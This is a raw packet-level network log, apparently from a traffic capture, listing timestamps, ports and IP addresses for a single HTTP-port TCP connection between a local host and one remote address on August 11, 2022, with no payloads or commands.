Aug 11, 2022 06:57:09.313807964 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.313834906 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.313873053 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.313893080 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.313911915 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.313947916 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.313967943 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.313978910 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.314004898 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.314038992 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.314665079 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.314704895 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.314743042 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.314769983 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.314779997 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.314805984 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.314836025 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.315184116 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.315223932 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.315253019 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.315260887 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.315274000 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.315296888 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.315314054 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.315335035 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.315392971 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.315483093 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.315494061 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.316215038 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.316255093 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.316288948 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.316292048 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.316328049 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.316339970 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.316351891 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.316365957 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.316370010 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.316405058 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.316416979 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.316741943 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.316778898 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.316802979 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.316816092 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.316854000 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.316862106 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.316890001 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.316911936 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.316927910 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.316929102 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.317481995 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.317745924 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.317812920 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.318828106 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.318865061 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.318931103 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.319335938 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.319395065 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.319431067 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.319462061 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.319468021 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.319480896 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.320939064 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.320977926 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.321007967 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.321038961 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.321934938 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.321970940 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.322004080 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.322025061 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.322031975 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.322036982 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.322074890 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.322099924 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.322115898 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.322132111 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.323003054 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.323043108 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.323065042 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.323081017 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.323091984 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.323118925 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.323137999 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.323157072 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.323187113 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.323194981 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.323255062 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.324148893 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.324187040 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.324229956 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.324239016 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.324239016 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.324279070 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.324311972 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.324316025 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.324351072 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.324352026 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.324362993 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.324408054 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.324621916 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.324661016 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.324683905 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.324697971 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.324724913 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.324734926 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.324748993 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.324773073 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.324811935 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.324826002 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.325632095 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.325671911 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.325706005 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.325707912 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.325732946 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.325745106 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.325768948 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.325782061 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.325794935 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.325819016 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.325871944 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.326685905 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.326728106 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.326764107 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.326795101 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.326802015 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.326824903 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.326839924 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.326863050 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.326878071 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.326930046 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.327193975 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.327230930 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.327267885 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.327296019 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.327303886 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.327313900 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.327342033 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.327357054 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.327399969 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.327400923 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.327729940 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.327768087 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.327799082 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.327805042 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.327840090 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.327843904 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.327858925 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.327879906 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.327918053 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.327930927 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.328408003 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.328780890 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.328794003 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.328819990 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.328860044 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.328867912 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.328897953 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.328911066 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.328937054 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.328989029 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.329813957 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.329850912 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.329888105 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.329900026 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.329921961 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.329926968 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.329942942 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.329963923 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.330001116 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.330020905 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.330085039 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.332500935 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.332540035 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.332578897 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.332608938 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.332616091 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.332648993 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.332653046 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.332684040 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.332689047 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.332707882 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.332721949 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.332730055 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.332758904 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.332777023 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.332797050 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.332803011 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.332835913 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.332890034 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.332947969 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.332986116 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.333020926 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.333044052 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.333058119 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.333065033 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.333098888 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.333134890 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.333151102 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.333172083 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.333178043 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.333209991 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.333226919 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.333245993 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.333252907 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.333283901 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.333297014 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.333321095 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.333359003 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.333370924 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.333398104 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.333432913 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.333456039 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.333471060 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.333477974 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.333508968 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.333544970 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.333561897 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.333584070 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.333586931 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.333621025 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.333658934 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.333674908 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.333993912 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.334028959 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.334065914 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.334110975 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.334146023 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.334158897 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.334183931 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.334188938 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.334193945 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.334239006 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.336612940 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.336644888 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.336679935 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.336709976 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.336736917 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.337151051 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.337182999 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.337214947 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.337219000 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.337255955 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.337275028 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.337722063 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.337753057 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.337781906 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.337784052 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.337807894 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.337815046 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.337829113 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.337858915 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.337874889 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.337892056 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.337944031 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.338233948 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.338267088 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.338295937 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.338324070 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.338327885 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.338337898 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.338376999 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.338701010 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.338735104 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.338810921 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.339221954 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.339255095 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.339283943 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.339284897 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.339315891 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.339318037 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.339329958 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.339365959 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.339400053 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.339432955 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.339452028 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.339812994 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.339843988 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.339875937 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.339905024 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.339907885 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.339931965 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.339939117 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.339963913 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.339972019 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.340023041 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.340265989 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.340341091 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.639240026 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.691471100 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.691534996 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.691586971 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.691641092 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.691689014 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.691732883 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.691741943 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.691762924 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.691768885 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.691772938 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.691786051 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.691800117 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.693629980 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.704036951 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.704091072 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.704129934 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.704165936 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.704178095 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.704193115 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.704205036 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.704231024 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.704238892 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.704241991 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.704246044 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.704273939 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.704294920 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.704319000 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.706011057 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.706048965 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.706084967 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.706110001 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.706123114 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.706130028 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.706160069 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.706173897 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.706199884 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.706217051 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.706228971 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.706260920 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.706265926 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.706269026 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.706302881 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.706338882 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.706368923 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.706376076 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.706386089 CEST	49736	80	192.168.2.3	89.208.103.4
